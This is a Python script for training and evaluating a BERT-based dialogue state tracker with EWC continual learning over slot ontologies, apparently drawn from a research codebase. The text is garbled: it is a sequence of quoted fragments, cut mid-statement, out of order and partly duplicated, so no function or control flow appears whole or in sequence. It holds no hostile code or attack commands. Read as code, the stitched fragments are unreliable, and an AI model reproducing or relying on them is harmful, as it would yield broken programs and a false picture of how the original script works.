SequentialSampler(dev_data) dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size) logger.info(\"Loaded data!\") ############################################################################### #", "[batch, turn, word] all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length) all_input_len = all_input_len.view(-1, max_turn_length, 2)", "the list: bert-base-uncased, \" \"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \" \"bert-base-multilingual-cased, bert-base-chinese.\") parser.add_argument(\"--bert_dir\", default='/gfs/nlp/.pytorch_pretrained_bert',", "nb_eval_ex if eval_acc_slot is None: eval_acc_slot = acc_slot * nb_eval_ex else: eval_acc_slot +=", "loss = tr_loss / nb_tr_steps if args.do_train else None result = {'eval_loss': eval_loss,", "dev_acc, global_step) summary_writer.add_scalar(\"Validate/Prev_Loss\", prev_dev_loss, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc\", prev_dev_acc, global_step) if n_gpu == 1: for", "eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids = all_input_ids.to(device), all_input_len.to( device), all_label_ids.to(device)", "Num examples = %d\", len(train_examples)) logger.info(\" Batch size = %d\", args.train_batch_size) logger.info(\" Num", "steps = %d\", num_train_steps) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device),", "= len(tokens_b) + 1 input_ids = tokenizer.convert_tokens_to_ids(tokens) # Zero-pad up to the sequence", "self.prev_slot] def _create_examples(self, lines, set_type, accumulation=False): \"\"\"Creates examples for the training and dev", "_hard_coding_label(label): return 'do not care' if label=='dontcare' else label def _get_label(label, label_list): label_id", "domain in enumerate(ontology_items): slot, value = domain if slot == \"pricerange\": slot =", "rnns zero\") parser.add_argument('--skip_connect', type=str, default=False, help=\"skip-connection\") parser.add_argument('--attn_head', type=int, default=4, help=\"the number of heads", "enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" % slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" % slot.replace(' ','_'), prev_dev_acc_slot[i], global_step)", "eval_accuracy, eval_acc_slot = \\ _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex)", "x in range(num_labels[i])] for i in range(len(num_labels))] eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len,", "plt.show() plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close() if not acc == 1: dialog = []", "nb_dev_examples dev_acc = dev_acc / nb_dev_examples prev_dev_loss = prev_dev_loss / prev_nb_dev_examples prev_dev_acc =", "map_location=device) del_list = [] for key in ptr_model.keys(): if ('slot' in key) or", "[SEP] with \"- 2\" if len(tokens_a) > max_seq_length - 2: tokens_a = tokens_a[:(max_seq_length", "be replaced with '[SEP]' after tokenization. text_a = line[2] + \" # \"", "dev_sampler = SequentialSampler(dev_data) dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size) logger.info(\"Loaded data!\") ############################################################################### # Build", "ontology according to the alphabetic order of the slots self.ontology = collections.OrderedDict(sorted(ontology.items())) #", "label=='dontcare' else label def _get_label(label, label_list): label_id = [] label_info = '' label_map", "Batch size = %d\", args.eval_batch_size) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) # Run", "logger.info('Processor: previous slots: ' + ', '.join(self.prev_slot)) logger.info('Processor: target slots: '+ ', '.join(self.target_slot))", "* prev_num_valid_turn prev_dev_acc += prev_acc.item() * prev_num_valid_turn if n_gpu == 1: if dev_loss_slot", "in no_decay)], 'weight_decay': 0.0, 'lr': args.learning_rate}, ] return optimizer_grouped_parameters if n_gpu == 1:", "slot-value embeddings label_token_ids, label_len = [], [] for labels in label_list: token_ids, lens", "# line[2]: user utterance text_b = line[3] # line[3]: system response label =", "to the maximum length.\"\"\" while True: total_length = len(tokens_a) + len(tokens_b) if total_length", "= line[2] text_b = line[3] prev_dialogue_index = line[0] else: # The symbol '#'", ") parser.add_argument(\"--prev_slot\", default='', type=str, required=True, help=\"Previous trained slots. ex. '0:1:2 or an excluding", "BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker elif args.nbt == 'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC", "tokens_a.pop() else: tokens_b.pop() ############################################################################### # Miscellaneous functions ############################################################################### def accuracy(out, labels): outputs =", "= convert_examples_to_features( dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running validation *****\") logger.info(\"", "prev_eval_loss / nb_eval_examples_prev prev_eval_accuracy = prev_eval_accuracy / nb_eval_examples_prev eval_acc_slot = eval_acc_slot / nb_eval_examples", "model = BeliefTracker(args, num_labels, device) if args.fp16: model.half() # Load pretrained model #", "= prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) num_valid_turn = torch.sum(label_ids[:,:,0].view(-1) > -1, 0).item() dev_loss +=", "draw(data, x, y, ax): seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0, cbar=False, ax=ax) class_correct", "text_b = line[3] prev_dialogue_index = line[0] else: # The symbol '#' will be", "torch.sum(label_ids[:,:,0].view(-1) > -1, 0).item() dev_loss += loss.item() * num_valid_turn dev_acc += acc.item() *", "break ############################################################################### # Evaluation ############################################################################### # Test output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") # Load", "BeliefTracker(args, num_labels, device) if args.fp16: model.half() # Load pretrained model # in the", "from torch.utils.data.distributed import DistributedSampler from pytorch_pretrained_bert.tokenization import BertTokenizer from pytorch_pretrained_bert.optimization import BertAdam from", "loss, loss_slot, acc, acc_slot, nb_eval_ex): eval_loss += loss.item() * nb_eval_ex eval_accuracy += acc.item()", "[] for (i, line) in enumerate(lines): guid = \"%s-%s-%s\" % (set_type, line[0], line[1])", "default=None, type=str, required=True, help=\"The name of the task to train: bert, bert-gru, bert-lstm,", "num_valid_turn prev_dev_loss_slot = [ l * prev_num_valid_turn for l in prev_loss_slot] prev_dev_acc_slot =", "parameters parser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The maximum total input sequence length after WordPiece tokenization.", "outputs = np.argmax(out, axis=1) return np.sum(outputs == labels) def warmup_linear(x, warmup=0.002): if x", "code ############################################################################### if args.do_train: logger.info(\"Training...\") global_step = 0 last_update = None best_loss =", "input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0)", "n_gpu, target_slot=prev_slot_id) else: loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,", "else: text_a = line[2] # line[2]: user utterance text_b = line[3] # line[3]:", "name 'attraction'\" ) parser.add_argument(\"--prev_slot\", default='', type=str, required=True, help=\"Previous trained slots. ex. '0:1:2 or", "prev_nb_dev_examples += prev_num_valid_turn dev_loss = dev_loss / nb_dev_examples dev_acc = dev_acc / nb_dev_examples", "('slot' in key) or ('value' in key): del_list.append(key) for key in del_list: del", "raise NotImplementedError() def get_labels(self): \"\"\"Gets the list of labels for this data set.\"\"\"", "'train':'29:30:31:32:33:34'} target_slot =[] prev_slot = [] for key, value in slot_idx.items(): if key", "help=\"nbt type: rnn or transformer or turn\" ) parser.add_argument(\"--fix_utterance_encoder\", action='store_true', help=\"Do not train", "of `do_train` or `do_eval` must be True.\") ############################################################################### # Load data ############################################################################### #", "ptr_model[new_key] = ptr_model[key] del ptr_model[key] state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get", "dataset (GLUE version).\"\"\" def __init__(self, config): super(Processor, self).__init__() import json if config.data_dir ==", "nb_dev_examples prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples if summary_writer is not None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss,", "dataset model.eval() dev_loss = 0 dev_acc = 0 dev_loss_slot, dev_acc_slot = None, None", "random import collections import operator from tqdm import tqdm, trange import numpy as", "rnn or transformer') from BeliefTrackerSlotQueryMultiSlotEWC import EWC model = BeliefTracker(args, num_labels, device) if", "and dev sets.\"\"\" prev_dialogue_index = None examples = [] for (i, line) in", "= [ {'params': [p for n, p in param_optimizer if not any(nd in", "ontology[\"request\"] for slot in ontology.keys(): ontology[slot].append(\"do not care\") ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir ==", "plt.subplots(nturn, 1, figsize=(50, 10*nturn)) print(\"Slot\", slot) for turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0,", "for i in range(len(num_labels))] eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids = convert_examples_to_features(", "slot in range(nslot): for turn in range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1 if label_ids[0][turn][slot] == pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]]", "slots in previous task target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot))) # list of slots in", "= prev_acc_slot * prev_num_valid_turn else: for i, l in enumerate(loss_slot): dev_loss_slot[i] = dev_loss_slot[i]", "example for simple sequence classification.\"\"\" def __init__(self, guid, text_a, text_b=None, label=None, prev_label=None): self.guid", "help=\"Set this flag if you are using an uncased model.\") parser.add_argument(\"--set_label_encoder_trainable\", action='store_true', help=\"Set", "BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer) ############################################################################### # Training code ############################################################################### if args.do_train: logger.info(\"Training...\")", "the sequence length. input_ids += [0] * (max_seq_length - len(input_ids)) # Note: padding", "a tab separated value file.\"\"\" with open(input_file, \"r\", encoding='utf-8') as f: reader =", "\"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\") optimizer =", "- %(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO) logger = logging.getLogger(__name__) ###############################################################################", "loss_ + args.lambda_ewc * loss_ewc prev_loss, _, prev_acc, prev_acc_slot, _ = model(input_ids, input_len,", "target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running training *****\") logger.info(\" Num examples =", "ptr_model[key] for key in rename_list: new_key = key.replace('rnn.', 'nbt.') ptr_model[new_key] = ptr_model[key] del", "argparse.ArgumentParser() ## Required parameters parser.add_argument('--data_dir', type=str, required=True, help='location of the data corpus') parser.add_argument(\"--bert_model\",", "instead of 32-bit\") parser.add_argument('--loss_scale', type=float, default=0, help=\"Loss scaling to improve fp16 numeric stability.", "None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc, global_step) summary_writer.add_scalar(\"Validate/Prev_Loss\", prev_dev_loss, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc\", prev_dev_acc, global_step)", "operator from tqdm import tqdm, trange import numpy as np import torch from", "data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation) def get_dev_examples(self,", "RNN layers\") parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial hidden of rnns zero\") parser.add_argument('--skip_connect', type=str, default=False,", "acc_slot * nb_eval_ex else: eval_acc_slot += acc_slot * nb_eval_ex return eval_loss, eval_loss_slot, eval_accuracy,", "default=1, help=\"Number of updates steps to accumulate before performing a backward/update pass.\") parser.add_argument('--fp16',", "help=\"Total batch size for eval.\") parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The initial learning rate for", "x in tokens])) logger.info(\"input_ids: %s\" % \" \".join([str(x) for x in input_ids])) logger.info(\"input_len:", "= epoch best_loss = dev_loss best_acc = dev_acc logger.info(\"*** Model Updated: Epoch=%d, Validation", "examples = %d\", len(dev_examples)) logger.info(\" Batch size = %d\", args.dev_batch_size) logger.info(\" Num steps", "value_lookup del_list.append(key) if ('rnn.' in key): # rename rnn -> nbt, rename_list.append(key) for", "(GLUE version).\"\"\" def __init__(self, config): super(Processor, self).__init__() import json if config.data_dir == \"data/woz\"", "= dev_acc / nb_dev_examples prev_dev_loss = prev_dev_loss / prev_nb_dev_examples prev_dev_acc = prev_dev_acc /", "acc=%.6f ***\" \\ % (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc)) dev_loss = round(dev_loss, 6)", "%d\", args.eval_batch_size) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) # Run prediction for full", "in key) or ('value_lookup' in key): # remove slot_lookup and value_lookup del_list.append(key) if", "tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens) label_len = len(label_token_ids) label_padding = [0] *", "help=\"the number of heads in multi-headed attention\") parser.add_argument(\"--do_train\", action='store_true', help=\"Whether to run training.\")", "all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim) return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids def get_label_embedding(labels, max_seq_length,", "\"E.g., 0.1 = 10%% of training.\") parser.add_argument(\"--lambda_ewc\", default=0.1, type=float, help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\",", "in label_list] # Number of labels of all slots #prev_slot_id = processor.prev_slot_idx #target_slot_id", "'.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '') text['label'] = [str(label_list[idx][x]) for idx, x in enumerate(label.cpu().numpy())] text['pred'] =", "line[4+idx] for idx in self.prev_slot_idx] examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, prev_label=prev_label)) return examples", "batch_size=1) model.eval() none_value_id = [ len(val)-1 for val in label_list] incorrect_dialogs = []", "\"\"\"Truncates a sequence pair in place to the maximum length.\"\"\" while True: total_length", "labels in label_list] # Number of labels of all slots #prev_slot_id = processor.prev_slot_idx", "NotImplementedError() def get_dev_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for the dev set.\"\"\"", "+ args.lambda_ewc * loss_ewc else: loss_, _, acc, acc_slot, _ = model(input_ids, input_len,", "least \\\"gru\\\" or \\\"lstm\\\"\") elif args.nbt =='turn': from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker elif args.nbt", "+ \" # \" + text_b else: text_a = line[2] # line[2]: user", "slots in previous tasks class InputFeatures(object): \"\"\"A single set of features of data.\"\"\"", "torch.tensor([f.input_len for f in features], dtype=torch.long) all_label_ids = torch.tensor([f.label_id for f in features],", "prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" % slot.replace(' ','_'), prev_dev_acc_slot[i], global_step) logger.info(\"*** Model Updated: Epoch=%d, Valid", "DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size) logger.info(\"Loaded data!\") ############################################################################### # Build the models ############################################################################### # Prepare", "slot.replace(' ','_'), prev_dev_acc_slot[i], global_step) logger.info(\"*** Model Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, Valid", "= RandomSampler(train_data) else: train_sampler = DistributedSampler(train_data) train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size) ## Dev", "None examples = [] for (i, line) in enumerate(lines): guid = \"%s-%s-%s\" %", "care\") ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir == \"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology", "label_ids[0][turn][slot] == pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]] +=1 drawfig = False print('hotel') print(label_ids[0, 0:10, 8:18].cpu() ==", "Eval results *****\") for key in sorted(result.keys()): logger.info(\" %s = %s\", key, str(result[key]))", "if total_length <= max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() ###############################################################################", "acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot,", "in total_acc_slot]) } out_file_name = 'eval_results' if args.target_slot=='all': out_file_name += '_all' output_eval_file =", "global_step) logger.info(\"*** Model Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, Valid prev loss=%.6f, Valid", "prev_acc_slot, nb_eval_ex_prev) eval_loss /= nb_eval_examples if eval_loss_slot is None: # for multi-gpu eval_loss_slot", "base class.\"\"\" return [ self.ontology[slot] for slot in self.prev_slot] def _create_examples(self, lines, set_type,", "for x in tokenizer.tokenize(example.text_a)] tokens_b = None if example.text_b: tokens_b = [x if", "tqdm, trange import numpy as np import torch from torch.utils.data import TensorDataset, DataLoader,", "the distributed backend which will take care of sychronizing nodes/GPUs torch.distributed.init_process_group(backend='nccl') logger.info(\"device: {}", "TRAIN model.train() tr_loss = 0 nb_tr_examples, nb_tr_steps = 0, 0 for step, batch", "_, _, acc, _, pred_slot = model(input_ids, input_len, label_ids, 1) nturn = (label_ids[:,:,0].view(-1)", "batch) input_ids, input_len, label_ids, _ = batch if n_gpu == 1: loss_, loss_slot,", "nb_eval_ex_prev nb_eval_ex = (label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples += nb_eval_ex nb_eval_steps += 1 def", "= torch.tensor([f.label_id for f in features], dtype=torch.long) all_prev_label_ids = torch.tensor([f.prev_label_id for f in", "\" \".join([str(x) for x in input_ids])) logger.info(\"input_len: %s\" % \" \".join([str(x) for x", "= %d\", num_train_steps) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device)", "sequence classification.\"\"\" def __init__(self, guid, text_a, text_b=None, label=None, prev_label=None): self.guid = guid self.text_a", "in this training task self.prev_label = prev_label # trained slots in previous tasks", "from BeliefTrackerSlotQueryMultiSlotEWC import EWC else: raise ValueError('nbt type should be either rnn or", "tokens_b = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)]", "one of `do_train` or `do_eval` must be True.\") ############################################################################### # Load data ###############################################################################", "open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology = json.load(fp_ontology) ontology = ontology[\"informable\"] del ontology[\"request\"] for slot", "the models ############################################################################### # Prepare model if args.nbt =='rnn': from BeliefTrackerSlotQueryMultiSlot import BeliefTracker", "-1 or args.no_cuda: device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\")", "args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device)", "############################################################################### # Load data ############################################################################### # Get Processor processor = Processor(args) prev_label_list =", "\"per_class_accuracy.txt\") with open(output_eval_incorr_file, \"w\") as writer: total_class_acc = 0 total_slot_class_acc = [] nlabels", "torch from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler from torch.utils.data.distributed import DistributedSampler from", "\"0 (default value): dynamic loss scaling.\\n\" \"Positive power of 2: static loss scaling", "print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0,", "x in config.target_slot.split(':')]) self.prev_slot_idx = sorted([ int(x) for x in config.prev_slot.split(':')]) ontology_items =", "prev_acc, prev_acc_slot, nb_eval_ex_prev) eval_loss /= nb_eval_examples if eval_loss_slot is None: # for multi-gpu", "num_train_steps if args.local_rank != -1: t_total = t_total // torch.distributed.get_world_size() if args.fp16: try:", "label: \" + prev_label_info) curr_dialogue_idx = example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2]) if (prev_dialogue_idx is", "# for multi-gpu eval_loss_slot = [0] prev_eval_loss_slot = [0] eval_accuracy = eval_accuracy /", "acc.item() * nb_eval_ex if loss_slot is not None: if eval_loss_slot is None: eval_loss_slot", "raise NotImplementedError() # sorting the ontology according to the alphabetic order of the", "range(0, nslot): fig, axs = plt.subplots(nturn, 1, figsize=(50, 10*nturn)) print(\"Slot\", slot) for turn", "if args.do_analyze and (args.local_rank == -1 or torch.distributed.get_rank() == 0): pdb.set_trace() def draw(data,", "acc == 1: dialog = [] for input, label, pred in zip(input_ids[0], label_ids[0],", "!= line[0]: text_a = line[2] text_b = line[3] prev_dialogue_index = line[0] else: #", "sequences shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The maximum", "slots to train self.target_slot = [] self.prev_slot = [] self.target_slot_idx = sorted([ int(x)", "loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ =", "default='tensorboard', type=str, required=False, help=\"Tensorboard directory\") parser.add_argument(\"--nbt\", default='rnn', type=str, required=True, help=\"nbt type: rnn or", "('value_lookup' in key): # remove slot_lookup and value_lookup del_list.append(key) if ('rnn.' in key):", "prev_nb_dev_examples if n_gpu == 1: dev_acc_slot = dev_acc_slot / nb_dev_examples prev_dev_acc_slot = prev_dev_acc_slot", "len(processor.prev_slot))) # List of slots in previous task target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot))) #", "default='', help='pretrained model directory name') parser.add_argument(\"--target_slot\", default='', type=str, required=True, help=\"Target slot idx to", "> 1: model = model.module state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get", "attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len) for slot in range(0, nslot): fig, axs", "summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace(' ','_'), acc_slot[i], global_step) tr_loss", "l * nb_eval_ex for l in loss_slot] else: for i, l in enumerate(loss_slot):", "all_label_ids.to(device), all_prev_label_ids.to(device) logger.info(\"***** Running evaluation *****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\"", "ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc if args.gradient_accumulation_steps > 1: loss", "if loss_slot is not None: if eval_loss_slot is None: eval_loss_slot = [ l", "required=True, help=\"The name of the task to train: bert, bert-gru, bert-lstm, \" \"bert-label-embedding,", "logger.info(\"Loaded data!\") ############################################################################### # Build the models ############################################################################### # Prepare model if args.nbt", "in enumerate(loss_slot): eval_loss_slot[i] = eval_loss_slot[i] + l * nb_eval_ex if eval_acc_slot is None:", "all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) logger.info(\"***** Running evaluation *****\") logger.info(\" Num", "default=0.1, type=float, help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not to use CUDA when", "for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval() eval_loss,", "args.no_cuda else \"cpu\") n_gpu = torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\", args.local_rank) n_gpu", "prev_acc_slot.mean(0) nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples_prev += nb_eval_ex_prev nb_eval_ex = (label_ids[:,:,0].view(-1) !=", "if args.fp16: optimizer.backward(loss) else: loss.backward() if summary_writer is not None: summary_writer.add_scalar(\"Epoch\", epoch, global_step)", "self.prev_label = prev_label # trained slots in previous tasks class InputFeatures(object): \"\"\"A single", "############################################################################### # Test output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") # Load a trained model that", "== torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0, 0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1)) print(label_ids[0, 0:10, 18:].cpu() ==", "prev_dev_acc = prev_dev_acc / prev_nb_dev_examples if n_gpu == 1: dev_acc_slot = dev_acc_slot /", "int(x) for x in config.prev_slot.split(':')]) ontology_items = list(self.ontology.items()) for idx, domain in enumerate(ontology_items):", "= sorted([ int(x) for x in config.target_slot.split(':')]) self.prev_slot_idx = sorted([ int(x) for x", "help=\"The output directory where the model predictions and checkpoints will be written.\") parser.add_argument('--load_path',", "curr_dialogue_idx prev_turn_idx = curr_turn_idx if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim,", "Batch size = %d\", args.dev_batch_size) logger.info(\" Num steps = %d\", num_dev_steps) all_input_ids_dev, all_input_len_dev,", "%s \" % vocab_dir) tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case) num_train_steps = None accumulation =", "loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss_", "model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss_ + args.lambda_ewc * ewc.penalty(model) prev_loss,", "t in batch) input_ids, input_len, label_ids, _ = batch if n_gpu == 1:", "help=\"Total batch size for training.\") parser.add_argument(\"--dev_batch_size\", default=1, type=int, help=\"Total batch size for validation.\")", "backward/update pass.\") parser.add_argument('--fp16', action='store_true', help=\"Whether to use 16-bit float precision instead of 32-bit\")", "ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc else: loss_, _, acc, acc_slot,", "line[2] + \" # \" + text_a text_b = line[3] + \" #", "with '[SEP]' after tokenization. text_a = line[2] + \" # \" + text_a", "= batch if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids", "for i, l in enumerate(loss_slot): dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn dev_acc_slot", "warmup_linear(x, warmup=0.002): if x < warmup: return x / warmup return 1.0 -", "label_ids, 1) nturn = (label_ids[:,:,0].view(-1) != -1).sum().item() nslot = label_ids.size(2) for slot in", "out_file_name = 'eval_results' if args.target_slot=='all': out_file_name += '_all' output_eval_file = os.path.join(args.output_dir, \"%s.txt\" %", "eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1) model.eval() none_value_id = [ len(val)-1 for val in", "== \"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology = json.load(fp_ontology) for slot in", "+ [\"[SEP]\"] label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens) label_len = len(label_token_ids) label_padding = [0] * (max_seq_length", "[CLS] and [SEP] with \"- 2\" if len(tokens_a) > max_seq_length - 2: tokens_a", "'[SEP]' after tokenization. text_a = line[2] + \" # \" + text_a text_b", "= [str(label_list[idx][x]) for idx, x in enumerate(label.cpu().numpy())] text['pred'] = [str(label_list[idx][x]) for idx, x", "' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '') text['label'] = [str(label_list[idx][x]) for idx, x in enumerate(label.cpu().numpy())] text['pred']", "total_class_acc+=slot_class_acc total_class_acc /= nlabels for sid, slot_acc in enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\" % (sid, slot_acc))", "len(prev_label_list) def _hard_coding_label(label): return 'do not care' if label=='dontcare' else label def _get_label(label,", "type=int, default=-1, help=\"local_rank for distributed training on gpus\") parser.add_argument('--seed', type=int, default=42, help=\"random seed", "acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ = loss_.mean() acc =", "pred in zip(input_ids[0], label_ids[0], pred_slot[0]): if label[0] == -1: break text = {}", "list: bert-base-uncased, \" \"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \" \"bert-base-multilingual-cased, bert-base-chinese.\") parser.add_argument(\"--bert_dir\", default='/gfs/nlp/.pytorch_pretrained_bert', type=str,", "if max_turn < int(example.guid.split('-')[2]): max_turn = int(example.guid.split('-')[2]) max_turn_length = min(max_turn+1, max_turn_length) logger.info(\"max_turn_length =", "if n_gpu == 1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'),", "import os import logging import argparse import random import collections import operator from", "+ label_info) logger.info(\"previous label: \" + prev_label_info) curr_dialogue_idx = example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2])", "if not os.path.exists(vocab_dir): raise ValueError(\"Can't find %s \" % vocab_dir) tokenizer = BertTokenizer.from_pretrained(vocab_dir,", "set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to run analysis on the test set.\") parser.add_argument(\"--do_lower_case\", action='store_true',", "len(features) % max_turn_length == 0 all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)", "' + ', '.join(self.prev_slot)) logger.info('Processor: target slots: '+ ', '.join(self.target_slot)) def get_train_examples(self, data_dir,", "all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long) all_prev_label_ids = torch.tensor([f.prev_label_id for f", "prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss_, _, acc,", "\"test.tsv\")), \"test\", accumulation) def get_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot", "if args.do_train: train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation) dev_examples = 